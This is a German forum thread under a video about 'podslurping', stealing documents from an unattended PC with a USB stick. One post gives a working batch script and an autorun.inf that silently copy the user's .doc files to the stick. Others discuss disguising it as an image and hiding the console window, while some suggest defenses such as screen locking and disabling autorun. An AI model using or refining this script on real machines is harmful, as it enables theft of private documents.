So leicht geht Datenklau - Podslurping erklärt auf PC-WELT.tv

Also bei mir funzt das nciht. Ich habe eine Autorun.inf, die ich sogar schreibgeschützt hab. Außerdem hab ich die Batch-Datei so gfut man es lesen konnte einfach abgeschrieben. Windows verbietet aber normalerweise das Abspielen von Autorun-Daten von Wechseldatenträgern. Muss ich meinen Stick evtl irgendwie speziell formatieren?

 

Was genau funktioniert bei dir nicht? Der Aufruf mit Autorun.inf der Batch oder die Arbeit der Xcopy-Bat?

Bei mir heißt sie stick.bat:

Code:

@echo off
mkdir \doc\%computername%
xcopy "C:\Dokumente und Einstellungen\%username%\*.doc" doc\%computername% /s/c/g/r/h
@cls
@exit

und die autorun.inf:

Code:

[autorun]
icon=
open=stick.bat

 

hi MichaelausP,

reicht es nicht, wenn man die Autorun-Funktion ausstellt?
Wenn ich aber doch einfach ENTER drücke wie im Video gezeigt, öffnet Windows doch automatisch den USB-Stick-Rootordner?! Und spätestens dort sieht das "Opfer" doch dann die verdächtigen Dateien bzw. merkt, wie heftig der USB-Stick und die HDD flackert.

 

Ja, es reicht, die Autorun-Funktion abzustellen, um damit das automatische Ausführen der Batch auf dem Stick zu unterbinden.
ABER!
Der ''Sinn'' soll sein, Daten vom PC/Notebook auf den Stick zu kopieren, in dem Moment, wo dieser unbeaufsichtigt im Büro steht. Der ''Täter'' führt dann die Bat auf dem Stick per Mausklick aus ...

Daher macht es Sinn, den Rechner vor dem Alleienrumstehenlassen vor unbefugtem Zugriff zu schützen (LOCK; PassWord oder Screensaver mit Aufruf des Anmeldebildschirms nach Beendigung).

 

ach so... aber ob das so "unauffällig" ist, wenn man an einem fremden arbeitsplatz rumhantiert.... denke, das würden zumindest die kollegen mitbekommen. besser wäre doch in jedem fall die methode:"guck dir mal dieses bild auf meinem stick an!" und dann eine getarnte jpeg/batch-datei laden, falls sowas technisch möglich ist, da hab ich keine ahnung.

 

Habe mal versucht, dasselbe Problem unter Ix-Systemen durchzuspielen:
-Man kann den Treiber (bei Linux z.B. usb_storage.ko löschen).
-Man kann auf einen Eintrag in der /etc/fstab verzichten, so dass man root sein muss, um Laufwerke zu mounten
-Man kann in der fstab read only als Mountoption angeben (man könnte noch Schadcode einschleusen, aber keine Daten entwenden)
-Eleganteste Lösung wäre, wenn es denn geht: Mounten nur für bestimmte Vendor_ID, Product_ID und Serial-No. erlauben.

Allgemein ist von den /home/username-Verzeichnissen nur das eigene lesbar, so dass man dann auch nur das Verzeichnis des gerade angemeldeten Benutzers entwenden/kopieren kann, wenn er seine X-Session nicht mit xlock gesperrt hat. Das wäre ja schon schlimm genug.

 

Diese Methode ist auch deshalb so verbreitet ( wie A.A. im Beitrag sagt), weil 1000 User ihre Datei-Ablagemethode der Strucktur von Windows anpassen.
Seine Dokumente da zu speichern, wo Windows (wieviel mal ist es offiziell verkauf und auf wieviel PC läuft es?) alles ablegt, was der Benutzer auf die Festplatte lädt, ist selbst ein bischen Schuld, wenn die dann unbemerkt verschwinden. Besser ist es doch, eine eigene Partition anzulegen und alle WordDokumente dort abzulegen... Den PC zu sicher, sagte ich wohl schon ...

 

einen anderen ordner oder eine andere partition anzulegen, halte ich für keine besonders clevere idee. diese kann man doch auch ganz einfach in einen befehl in die batch-datei einbinden und schon durchsucht das programm die komplette platte.

 

Das Durchsuchen der ganzen Platte, nur um an WordDokumente zu kommen, ist Zeitaufwendig zumal der Benutzer jeder Zeit zurück kommen könnte ...

Aber es stimmt schon, eine andere Dateiablagen-Verwaltung schützt auch nicht. Wer Daten klauen will, bereitet es entsprechend vor, schaut sich erstmal den Platteninhalt an, sieht die Aufteilung, macht den WordDokumentenordner aufindig, schreibt sich den auf und bereitet in Ruhe den Stick vor, um beim nächsten Mal den Dienstahl schnell zu erledigen ...

 

ja, aber was für ein aufwand! da stirbt die legitimation von podslurping doch schon mit der vorbereitung. ich hab das so verstanden, dass podslurping dem "ungezielten", spontanen "backup" von daten dienen soll...
und wenn der DOS-befehl die windows-suchroutine verwendet, kann selbst das durchsuchen des dokumentenordners zur geduldsprobe werden.

 

Aufruf der Autorun.inf.
Ist meines Wissens nach doch standartmäßig bei wechseldatenträgern deaktiviert. Habe übrigends noch XP (bin rückständig ;-)). Is ja eig auch egal. jetzt hab ich vergessen, was ich sagen wollte..... aso: Ich benutze TrueCrypt. Das is ein kostenoses Programm zum ersellen und Einbinden von virtuellen, verschlüsselten Datenträgern. Das Teil is echt gut, auch Performancemäßig. So hab ich auf meiner Backupfestplatte 4 Dateien mit Verschlüsselten Festplatten drin. Eine Davon ist für Dokumente und die mach ich halt nur auf, wenn cih sie braquche.

 

@MichaelausP
nach diesem Code in der stick.bat erscheint allerdings das Fenster der Eingabeaufforderung, während kopiert wird, im Film geschieht das aber völlig im Hintergrund. Woran liegt das? Ich bin in diesem Code leider nicht sehr bewandert, weiß also nicht, welcher Befehl das sein sollte.

gruß Abufari

 

also unter Vista funktioniert das ohne, dass man etwas merkt aber bei XP (erst vor Kurzem installiert und noch nie im I-net gewesen) funktioniert das irgendwie nicht...

 

Tach,
genau so sieht das bei mir auch aus..
1. brauch das ziemlich lange die Daten zu duchsuchen
2. ist immer noch das Fenster geöffnet

LG SteTro